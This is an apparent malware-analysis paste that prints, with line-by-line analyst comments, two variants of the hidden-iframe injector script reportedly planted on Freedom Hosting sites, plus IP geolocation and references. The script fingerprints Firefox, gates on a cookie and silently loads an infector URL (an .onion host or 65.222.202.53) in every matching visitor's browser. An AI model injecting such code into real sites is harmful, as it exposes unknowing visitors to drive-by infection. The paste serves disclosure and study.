
Freedom Hosting FBI IFRAME Redirector Malware Script

Jan 15th, 2015
# MalwareMustDie!
# This is the malicious JavaScript code set that was injected into the Freedom Hosting (FH) sites.
# It contains the IFRAMER malware technique: a near-invisible iframe that makes every visitor's browser
# silently request the infector site at:
# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
#
# Original copy at: www.twitlonger.com/show/n_1rlo0uu
# See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infecting every visitor to that site!!
# Anyone who accessed an FH site with Firefox and JavaScript enabled would have been exposed to this IFRAMER
# (the script gates only on a Firefox check and a 30-minute cookie, not on who the visitor is).
# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html (Firefox 17 ESR bug believed to be used by the payload served through the iframe)
# Ref: http://www.twitlonger.com/show/n_1rlo0uu
# Ref: http://pastebin.com/bu2Ya0n6
# Ref: http://pastebin.com/pmGEj9bV
  15.  
// Case 1: variant whose iframe targets the .onion infector URL (sample preserved verbatim; comments are analyst notes)
  17.  
    // Cookie writer used by the dropper's one-shot gate (see format_quick).
    // Sets `name=value` for the whole origin (path "/"). If `minutes` is truthy the
    // cookie expires that many minutes from now; otherwise no expires attribute is
    // written and it is a session cookie. The value is written unescaped — harmless
    // here because the only caller stores a fixed GUID.
    function createCookie(name,value,minutes) {
            if (minutes) {
                    var date = new Date();
                    date.setTime(date.getTime()+(minutes*60*1000));
                    var expires = "; expires="+date.toGMTString();
            }
            // Both `var expires` declarations hoist to one function-scoped binding,
            // so this branch correctly yields an empty expires attribute.
            else var expires = "";
            // No Secure/HttpOnly attributes; this is a plain marker cookie, not a secret.
            document.cookie = name+"="+value+expires+"; path=/";
    }
  27.      
    // Returns the raw (not URL-decoded) value of cookie `name`, or null if absent.
    // Splits document.cookie on ';', strips leading spaces from each piece and
    // matches on the exact "name=" prefix.
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
            var c = ca[i];
            // Trim the leading space the browser inserts after each ';'.
            while (c.charAt(0)==' ') c = c.substring(1,c.length);
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
  38.      
    // Firefox/Gecko fingerprint. True if any one of: the old Gecko-only DOM method
    // document.getBoxObjectFor exists, the Gecko-only window.mozInnerScreenX exists,
    // or "Firefox" appears in the UA string. Loose `!= null` is deliberate so that
    // both undefined and null count as "not present". No version check is done here.
    // NOTE(review): Tor Browser of that era was built on Firefox ESR and therefore
    // passes this test — consistent with the MFSA 2013-53 reference, but the
    // exploit targeting itself is not visible in this script; confirm from the payload.
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
  42.      
    // The "iframer". Appends a near-invisible iframe (5px tall, no border, no
    // scrollbars) to the page so the visitor's browser silently fetches the infector
    // URL with a fixed requestID, without any user action. The iframe is never
    // removed. What the .onion host served in response is not part of this paste.
    // The requestID here is a version-4 (random) UUID (third group starts with 4).
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        // .onion address: only reachable from a Tor-enabled browser, i.e. the FH audience.
        iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
        iframe.height = "5";
        // "*" is not a valid length value and is most likely ignored by the browser.
        iframe.width = "*";
        document.body.appendChild(iframe);
    }
  53.      
    // One-shot gate around the iframer: runs updatify() only when the "n_serv"
    // cookie is absent, then sets it for 30 minutes. Net effect: one iframe hit per
    // browser per half hour, which throttles repeat requests to the infector site.
    // The cookie value equals the requestID embedded in the iframe URL.
    function format_quick() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
            updatify();
        }
    }
  60.      
    // Polls document.readyState every 250 ms until the DOM is "interactive" or
    // "complete", then runs the cookie gate — but only for browsers that pass isFF().
    // Non-Firefox visitors get nothing; the whole chain is Firefox-targeted.
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {
     
            if ( isFF() ) {
                format_quick();
            }
        }
        else
        {
            // DOM not ready yet: re-check shortly.
            setTimeout(isReady, 250);
        }
    }
    // Entry point: start the readiness poll 250 ms after the injected script executes.
    setTimeout(isReady, 250);
  75.  
  76.  
// Case 2: same code, but the iframe targets the clearnet IP 65.222.202.53 instead of an .onion address (see the line marked (1))
  78.  
// Cookie writer used by the dropper's one-shot gate (see freedomhost).
// Sets `name=value` for the whole origin (path "/"). If `minutes` is truthy the
// cookie expires that many minutes from now; otherwise it is a session cookie.
// Identical in behaviour to the Case 1 helper; only whitespace differs.
function createCookie(name, value, minutes) {
    if (minutes) {
        var date = new Date();
        date.setTime(date.getTime() + (minutes * 60 * 1000));
        var expires = "; expires=" + date.toGMTString();
    } else var expires = ""; // hoisted `var`, same binding as above
    // Plain marker cookie: no Secure/HttpOnly, value written unescaped (fixed GUID only).
    document.cookie = name + "=" + value + expires + "; path=/";
}
  87.  
// Returns the raw value of cookie `name`, or null if absent. Exact "name=" prefix
// match on each ';'-separated piece after trimming leading spaces.
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}
  98.  
// Firefox/Gecko fingerprint: Gecko-only DOM members (document.getBoxObjectFor,
// window.mozInnerScreenX) or "Firefox" in the UA string. No version check.
// NOTE(review): Firefox ESR-based Tor Browser passes this; see MFSA 2013-53 ref.
function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
  102.  
// The "iframer", Case 2 variant. Same near-invisible iframe as Case 1, but the
// src is a plain-HTTP clearnet IP rather than an .onion address. A Tor Browser
// visitor would still reach it through a Tor exit, so the hit alone does not leak
// the client IP; the fixed requestID lets the server correlate the hit with this
// injection. Anything served or beaconed afterwards is outside this paste.
// The requestID is a version-1 (time-based) UUID (third group starts with 1);
// its embedded timestamp decodes to roughly August 2013, matching the FH
// takedown window — NOTE(review): re-derive before citing.
function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; // <== (1) 1ST CALLBACK SELF EXPLANATORY
    iframe.height = "5";
    iframe.width = "*"; // invalid length value, most likely ignored
    document.body.appendChild(iframe);
}
  113.  
// One-shot gate (same role as format_quick in Case 1, renamed): fire the iframer
// only when the "n_serv" cookie is absent, then set it for 30 minutes so the same
// browser is not re-served within that window. Cookie value equals the requestID
// in the Case 2 iframe URL.
function freedomhost() {
    if (!readCookie("n_serv")) {
        createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
        updatify();
    }
}
  120.  
// Polls document.readyState every 250 ms until "interactive"/"complete", then runs
// the cookie gate for Firefox visitors only. The commented-out alert is a debugging
// leftover from the script's author — useful as an attribution/dev-process artefact.
function isReady() {
    if (document.readyState === "interactive" || document.readyState === "complete") {
        if (isFF()) {
            //window.alert(window.location + "Firefox Detected.")
            freedomhost();
        }
    } else {
        setTimeout(isReady, 250);
    }
}
// Entry point: start the readiness poll 250 ms after the injected script executes.
setTimeout(isReady, 250);
  132.  
// Note: same method in both variants; only the iframe target and requestID differ.
// The second script's iframe callback goes to a clearnet IP (the line marked (1)) instead of an .onion address.
  135.  
  IP Address: 65.222.202.53
  City: Triadelphia
  State or Region: West Virginia
  Country: United States
  ISP: Verizon Business
  Latitude & Longitude: 40.0900, -80.6220
  Domain: verizonbusiness.com
  ZIP Code: 26059
  (Geolocation/ISP lookup as recorded at the time of the paste; netblock assignments change, so re-verify before using this IP as a live indicator.)
  144.  
  145. ---
  146. #MalwareMustDie! @unixfreaxjp